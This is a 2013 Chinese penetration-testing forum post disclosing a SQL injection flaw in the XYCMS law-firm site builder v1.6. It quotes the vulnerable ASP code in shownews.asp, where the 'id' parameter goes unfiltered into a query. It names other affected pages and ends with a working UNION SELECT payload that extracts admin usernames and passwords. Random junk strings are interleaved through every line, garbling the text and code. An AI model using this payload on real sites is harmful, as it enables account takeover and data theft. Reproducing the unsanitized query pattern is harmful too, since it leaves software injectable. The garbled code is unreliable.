中国网络渗透测试联盟

标题: XYCMS律师事务所建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:28
标题: XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似' R$ M; P# E3 w* R6 E+ M
& p7 Y+ I# g' V8 d4 Z: d& ~. Z- u7 L
淫荡分割线4 M; \$ x) W. ]" h$ J8 c0 B* p! b
--------------------------------------------------------  B. r/ y. i5 u; i8 \* K

1 i+ G) Y# m8 \3 y4 j审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
. F* N. Z8 S6 M; |, @% b& o0 X! Q* Z源码地址:http://down.chinaz.com/soft/29233.htm
* g0 H4 R* N% f3 c$ T) {. F
. Y/ I. O" i4 p" l9 }. f- z6 O8 ?' m漏洞文件:shownews.asp# a6 O$ ~" }) Z: t3 |, r, p+ o8 k
漏洞代码:7-13行7 `3 J) I$ R8 g4 J! j. N

5 F9 Q' h$ p( S+ j, w % f* ]: w; z; C6 @( M
<% 7 {$ S3 Z2 r# E  V
id=request.QueryString("id")% a- f7 f  \  S. P2 A, L
   
& j% k6 C7 N% U6 }) ^! l/ |set snews=server.createobject("adodb.recordset") 2 \% O8 c5 R  }' G. x: `, K6 ~) G
exec="select * from [news] where id="&id) ]* c6 D0 g7 F: ^3 G
snews.open exec,conn,1,1/ r; n6 Z6 w0 C6 i
%>1 ~! R$ E& Z& o7 h+ Q8 H
$ q! X" l5 a/ s9 }! F  r

7 E& p- ?8 M* M; q$ Z1 Q/ ^什么过滤都没有  直造成注入
. U; _. y3 x  d! n
8 J% O( K/ R3 B$ B) P: x2 r注入点:http://127.0.0.1:99/shownews.asp?id=xx
0 x& @% g0 k- k& p8 R+ t  I
  C4 j/ h) z( ~1 J& q$ e其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找6 E  V' _: l+ w
5 u3 H9 _6 ^( e+ y

2 z% ?% a) t3 j$ ]2 Aexp: union select 1,admin,password,4,5,7 from admin_user: {$ D6 z+ Y/ ~# {
# h, l; J' _- S. E8 q( c2 l7 I, w$ K




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2